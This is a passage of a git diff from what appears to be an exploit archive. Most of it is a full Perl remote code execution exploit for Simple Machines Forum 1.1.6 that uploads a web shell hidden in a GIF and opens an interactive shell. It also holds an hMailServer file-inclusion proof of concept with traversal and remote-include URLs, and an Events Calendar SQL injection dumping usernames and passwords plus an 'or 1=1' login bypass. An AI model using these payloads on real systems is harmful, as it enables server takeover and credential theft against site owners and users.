-			chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
-			chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
-			chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
-			chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
-			chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
-			chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
-			chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
-			chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
-			chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
-			chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
-			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
-			chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
-			chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
-			chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
-			chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
-			chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
-			chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
-			chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
-			chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
-			chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
-			chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
-			chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
-			chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
-			chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
-			chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
-			chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
-			chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
-			chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
-			chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
-			chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
-			chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
-			chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
-			chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
-			chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
-			chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
-			chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
-			chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
-			chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
-			chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
-			chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
-			chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
-			chr(0x04).chr(0x00).chr(0x3b).chr(0x00);
-
-## Logging in
-my $ret = $ua->post("$parms{s}/index.php?action=login2",
-		[
-			user			=> $parms{u},
-			passwrd			=> $parms{p},
-			cookielength	=> -1
-		]);
-
-## Getting id, sid and checking to see if we're logged on
-$ret = $ua->get("$parms{s}/index.php?action=profile");
-
-die "[!!] Wrong username/password\n"
-	unless $ret->as_string !~ /The user whose profile you are trying to view does not exist/;
-
-die "[!!] Error getting session id\n"
-	unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;
-
-die "[!!] Error getting id\n"
-	unless my($id) = $ret->as_string =~ /u=(\d+);/;
-
-print "[ii] Session ID = $sid\n".
-      "[ii] User Id = $id\n" if $parms{d};
-
-## Checking for shell
-$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => "echo expl0ited");
-
-&shell
-	if $ret->as_string =~ /expl0ited/;
-
-$ret = $ua->request( 
-		POST "$parms{s}/index.php?action=profile2",
-		Content_Type	=> 'multipart/form-data',
-		Content			=>
-		[
-			avatar_choice	=> "upload",
-			sc				=> $sid,
-			userID			=> $id,
-			sa				=> "forumProfile",
-			attachment		=>
-			[
-				undef,
-				"expl0ited.gif",
-				Content         => $shell,
-				"Content-Type"	=> "image/gif"
-			]
-		]);
-
-## Updating Settings.php
-$ret = $ua->get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=theme_dir;val=./attachments/avatar_${id}.gif\%2500");
-
-print "[ii] Uploaded a shell...\n"
-    if $parms{d};
-
-shell();
-
-## lulz @ this shit.
-sub shell {
-	my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
-    $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => '0998' );
-    ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---/s;
-
-	die "[!!] magic_quotes is turned on\n"
-		if (not defined $os or not defined $sh or $1 eq $id);
-		
-    $sh = $sh ? "php" : "cmd";
-    $os = $os =~ /win/i ? "win32" : "unix";
-    
-    do {
-		print "[$sh\@$os]\$ ";
-		$cmd = chomp (my $cmd = );
-		
-
-		exit
-			unless $cmd !~ /^exit$/i;
-
-        if( ($file) = $cmd =~ /^savefile (.*?) / ) {
-            $cmd =~ s/savefile $1 //;
-        } else { undef $file; }
-        
-        if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?) (.*?)$/ ) {
-            ($base) = $full =~ /\/(.*?)$/;
-            $cmd = "cd attachments;wget $full; mysql --user=$user --password=$pass < $base; rm $base;";
-        }
-
-        $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => $cmd);
-        $ret->as_string =~ /---1243---(.*?)---3421---/s;
-        print "$1\n";
-
-        if( defined $file ) {
-            open FILE, ">>", $file or die "[!!] Error writing to file; $!\n";
-            print FILE "Command Executed: $cmd\n".
-                       "Host: $parms{s}\n$1\n";
-            close FILE;
-        }
-	} while( $cmd !~ /^exit$/i );
-
-	exit;
-}
-
-# milw0rm.com [2008-11-05]
+#!/usr/bin/perl
+#
+# @title: Simple Machines Forum Code Execution
+# @versn: * <= 1.1.6
+# @authr: ~elmysterio ( a.k.a us )
+# @stats: DROPPED!!!!!!!
+# @descp: In loving memory of the rare bone marrow disease that killed rgod. 
+#         We can't thank you enough for killing a bug killer. 
+# @bug  : Sources/QueryString.php  & Sources/Themes.php w/ magic_quotes == Off
+# @gr33t: m0rt's failure,  it never stops.
+#   
+# C:\Documents and Settings\molest>perl P:\advisories\smf\smf_localfileinclude.pl
+# -s http://localhost/audit/smf116 -u regular -p test -d
+# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
+# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
+# [ii] User Id = 2
+# [ii] Uploaded a shell...
+# [cmd@win32]$ ver
+# 
+# Microsoft Windows XP [Version 5.1.2600]
+# 
+# [cmd@win32]$
+#
+#  FOR LULZ PURPOSE ONLY!!
+#
+use strict;
+use warnings;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+use Getopt::Long qw(:config no_ignore_case);
+
+print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";
+
+my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla FireFox" );
+my %parms = (	s => "",
+        		d => 0,
+        		x => sub { print "[**] Proxy found, using $_[1]\n"; $ua->proxy(['http'], $_[1]); },
+        		u => "Gl0ria!!!",
+        		p => "gl0ria\@herb3st" );
+
+GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s"; 
+
+if( !$parms{s} ) {
+		die <
+	[-s]    Site        -> http://site.com/forums
+	[-x]	Proxy       -> localhost:8118
+	[-u]	Username    -> Gl0ria!!!
+	[-p]    Password    -> gl0ria\@herb3st
+	[-d]    Debug
+HELP
+}
+
+my $shell = chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
+			chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
+			chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
+			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
+			chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
+			chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00). 
+			chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
+			chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00); $shell .= <<'EXIF';
+
+EXIF
+			$shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
+			chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
+			chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
+			chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
+			chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
+			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
+			chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
+			chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
+			chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
+			chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
+			chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
+			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
+			chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
+			chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
+			chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
+			chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
+			chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
+			chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
+			chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
+			chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
+			chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
+			chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
+			chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
+			chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
+			chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
+			chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
+			chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
+			chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
+			chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
+			chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
+			chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
+			chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
+			chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
+			chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
+			chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
+			chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
+			chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
+			chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
+			chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
+			chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
+			chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
+			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
+			chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
+			chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
+			chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
+			chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
+			chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
+			chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
+			chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
+			chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
+			chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
+			chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
+			chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
+			chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
+			chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
+			chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
+			chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
+			chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
+			chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
+			chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
+			chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
+			chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
+			chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
+			chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
+			chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
+			chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
+			chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
+			chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
+			chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
+			chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
+			chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
+			chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
+			chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
+			chr(0x04).chr(0x00).chr(0x3b).chr(0x00);
+
+## Logging in
+my $ret = $ua->post("$parms{s}/index.php?action=login2",
+		[
+			user			=> $parms{u},
+			passwrd			=> $parms{p},
+			cookielength	=> -1
+		]);
+
+## Getting id, sid and checking to see if we're logged on
+$ret = $ua->get("$parms{s}/index.php?action=profile");
+
+die "[!!] Wrong username/password\n"
+	unless $ret->as_string !~ /The user whose profile you are trying to view does not exist/;
+
+die "[!!] Error getting session id\n"
+	unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;
+
+die "[!!] Error getting id\n"
+	unless my($id) = $ret->as_string =~ /u=(\d+);/;
+
+print "[ii] Session ID = $sid\n".
+      "[ii] User Id = $id\n" if $parms{d};
+
+## Checking for shell
+$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => "echo expl0ited");
+
+&shell
+	if $ret->as_string =~ /expl0ited/;
+
+$ret = $ua->request( 
+		POST "$parms{s}/index.php?action=profile2",
+		Content_Type	=> 'multipart/form-data',
+		Content			=>
+		[
+			avatar_choice	=> "upload",
+			sc				=> $sid,
+			userID			=> $id,
+			sa				=> "forumProfile",
+			attachment		=>
+			[
+				undef,
+				"expl0ited.gif",
+				Content         => $shell,
+				"Content-Type"	=> "image/gif"
+			]
+		]);
+
+## Updating Settings.php
+$ret = $ua->get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=theme_dir;val=./attachments/avatar_${id}.gif\%2500");
+
+print "[ii] Uploaded a shell...\n"
+    if $parms{d};
+
+shell();
+
+## lulz @ this shit.
+sub shell {
+	my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
+    $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => '0998' );
+    ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---/s;
+
+	die "[!!] magic_quotes is turned on\n"
+		if (not defined $os or not defined $sh or $1 eq $id);
+		
+    $sh = $sh ? "php" : "cmd";
+    $os = $os =~ /win/i ? "win32" : "unix";
+    
+    do {
+		print "[$sh\@$os]\$ ";
+		$cmd = chomp (my $cmd = );
+		
+
+		exit
+			unless $cmd !~ /^exit$/i;
+
+        if( ($file) = $cmd =~ /^savefile (.*?) / ) {
+            $cmd =~ s/savefile $1 //;
+        } else { undef $file; }
+        
+        if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?) (.*?)$/ ) {
+            ($base) = $full =~ /\/(.*?)$/;
+            $cmd = "cd attachments;wget $full; mysql --user=$user --password=$pass < $base; rm $base;";
+        }
+
+        $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => $cmd);
+        $ret->as_string =~ /---1243---(.*?)---3421---/s;
+        print "$1\n";
+
+        if( defined $file ) {
+            open FILE, ">>", $file or die "[!!] Error writing to file; $!\n";
+            print FILE "Command Executed: $cmd\n".
+                       "Host: $parms{s}\n$1\n";
+            close FILE;
+        }
+	} while( $cmd !~ /^exit$/i );
+
+	exit;
+}
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7012.txt b/platforms/php/webapps/7012.txt
index e2343a2c0..3e113f1ca 100755
--- a/platforms/php/webapps/7012.txt
+++ b/platforms/php/webapps/7012.txt
@@ -1,132 +1,132 @@
-hMAilServer 4.4.2 (PHPWebAdmin) local & remote file inclusion poc
-by Nine:Situations:Group::strawdog
---------------------------------------------------------------------------------
-
-our site: http://retrogod.altervista.org
-
-software site: http://www.hmailserver.com/
-description: http://en.wikipedia.org/wiki/HMailServer
---------------------------------------------------------------------------------
-google dork: "PHPWebAdmin for hMailServer" intitle:PHPWebAdmin -site:hmailserver.com -dork
-
-poc:
-
-regardless of register_globals & magic_quotes_gpc:
-http://hostname/path_to_webadmin/index.php?page=background/../../../../../../../../boot.ini%00
-http://hostname/path_to_webadmin/index.php?page=background/../../Bin/hMailServer.INI%00
-http://hostname/path_to_webadmin/index.php?index.php?page=background/../../MySQL/my.ini%00
-http://hostname/path_to_webadmin/index.php?index.php?page=background/../../../../../../../../../Program+Files/hmailserver/Bin/hmailserver.ini%00
-
-with register_globals = on:
-(prepare a functions.php folder on somehost.com with an index.html with your shell inside on a php enabled server,
-otherwise a functions.php shell on a php disabled one)
-http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/&cmd=dir
-
-with register_globals = on & magic_quotes_gpc = off :
-http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\boot.ini%00
-http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/shell.txt%00&cmd=dir
-http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\Program+Files\hMailServer\Bin\hMailServer.INI%00
-http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=../Bin/hMailServer.INI%00
-
-"Bin" folder can be found in a different location, disclose the path by simply calling:
-
-http://hostname/path_to_webadmin/initialize.php
-
-interesting file:
-
-hMailServer.INI - contains two interesting fields:
-- the "Administrator password" crypted with md5,
-- by having knowledge of that you can calculate the MySQL root password,
-  specified in the "password" field.
-  You can do this by using the /Addons/Utilities/DecryptBlowfish.vbs script
-
-(*)
-vulnerable code, index.php:
-> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by  :  Cyb3r-1sT
-
-<> C0ntact : cyb3r-1st [at] hotmail.com 
-                   
-<> Groups : InjEctOr5 T3am 
-
-<> site : www.tryag.cc/cc
-
-=======================================================
-+++++++++++++++++++ Script information+++++++++++++++++
-=======================================================
-
-
-<<->> script      : Events Calendar v 1.2 
-
-<<->> script site : www.developiteasy.com/events-calendar-v-1.2-p-65.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13               
-
-
-
-=======================================================
-+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : find it
-
-<<->> Exploit :>>>
-
- >>>> www.site.me/calendar_details.php?id=-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login--
-      
- >>> demo ::: www.developiteasy.com/events_calendar/calendar_details.php?id=-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login--
-
-
-<<->> Exploit <<->> bypass <<->>
- 
-        >>>> www.developiteasy.com/events_calendar/admin
-        
-        >>> user : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
-        
-        >>> pass : cyb3r-1st ' or ' 1=1--     ( or u can use ' or 1=1-- )
-
-
-=======================================================
-++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
-=======================================================
-
-
-<<->> All freinds and all muslims
-
-# milw0rm.com [2008-11-06]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by  :  Cyb3r-1sT
+
+<> C0ntact : cyb3r-1st [at] hotmail.com 
+                   
+<> Groups : InjEctOr5 T3am 
+
+<> site : www.tryag.cc/cc
+
+=======================================================
++++++++++++++++++++ Script information+++++++++++++++++
+=======================================================
+
+
+<<->> script      : Events Calendar v 1.2 
+
+<<->> script site : www.developiteasy.com/events-calendar-v-1.2-p-65.html?cPath=58&osCsid=7sanrl2anes1t050jhc6ivnt13               
+
+
